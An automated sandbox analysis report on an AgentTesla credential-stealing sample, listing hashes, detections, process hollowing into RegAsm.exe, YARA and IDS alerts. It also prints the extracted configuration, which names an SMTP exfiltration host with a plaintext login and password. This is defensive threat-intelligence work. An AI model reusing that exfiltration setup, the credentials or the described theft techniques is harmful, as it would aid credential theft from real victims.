Edit tour

Windows Analysis Report
VYLigyTDuW.exe

Overview

General Information

Sample name:	VYLigyTDuW.exe renamed because original name is a hash value
Original sample name:	56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3.exe
Analysis ID:	1587591
MD5:	89471f2ae47d710f5b6db4afe8a48e77
SHA1:	903d8a21673dcc19826fa56731dc2710f2d95755
SHA256:	56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: RegAsm connects to smtp port

Suricata IDS alerts for network traffic

Yara detected AgentTesla

AI detected suspicious sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VYLigyTDuW.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\VYLigyTDuW.exe" MD5: 89471F2AE47D710F5B6DB4AFE8A48E77)

RegAsm.exe (PID: 7360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.4156794778.0000000002E82000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.4156794778.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4156794778.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: VYLigyTDuW.exe PID: 7300	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VYLigyTDuW.exe PID: 7300	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 7360	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7360	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.3.VYLigyTDuW.exe.6d1a10.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3175d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31879:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31955:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a7b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a04.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a04.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a04.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316f7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x31769:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317f3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31885:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318ef:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31961:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319f7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a87:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a10.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3175d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31879:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31955:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a7b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a10.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x316eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3175d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x317e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x31879:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x318e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31955:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x319eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31a7b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.VYLigyTDuW.exe.23a0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VYLigyTDuW.exe.23a0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.VYLigyTDuW.exe.23a0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 25 entries

Sigma Signatures

Networking

Sigma detected: RegAsm connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7360, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

Suricata Signatures

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:19:34.204660+0100	2030171	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:17:55.647888+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:17:55.647888+0100	2855245	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T15:19:34.204660+0100	2840032	1	A Network Trojan was detected	192.168.2.4	49735	162.254.34.31	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VYLigyTDuW.exe

Avira: detected

Found malware configuration

Source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}

Multi AV Scanner detection for submitted file

Source: VYLigyTDuW.exe	Virustotal: Detection: 84%			Perma Link
Source: VYLigyTDuW.exe	ReversingLabs: Detection: 87%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: VYLigyTDuW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49735 -> 162.254.34.31:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49735 -> 162.254.34.31:587

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587

Source: Joe Sandbox View	IP Address: 162.254.34.31 162.254.34.31
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 162.254.34.31:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	TCP traffic detected without corresponding DNS query: 162.254.34.31
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: VYLigyTDuW.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: VYLigyTDuW.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: VYLigyTDuW.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: VYLigyTDuW.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: VYLigyTDuW.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: VYLigyTDuW.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: VYLigyTDuW.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: VYLigyTDuW.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: VYLigyTDuW.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VYLigyTDuW.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: VYLigyTDuW.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4154134702.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: RegAsm.exe, 00000001.00000002.4156794778.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: VYLigyTDuW.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: VYLigyTDuW.exe	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0054AA9F NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,	0_2_0054AA9F
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A2DA5 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,	0_2_022A2DA5
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A2D84 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,	0_2_022A2D84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0044444F NtProtectVirtualMemory,	1_2_0044444F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0044148D NtClose,	1_2_0044148D
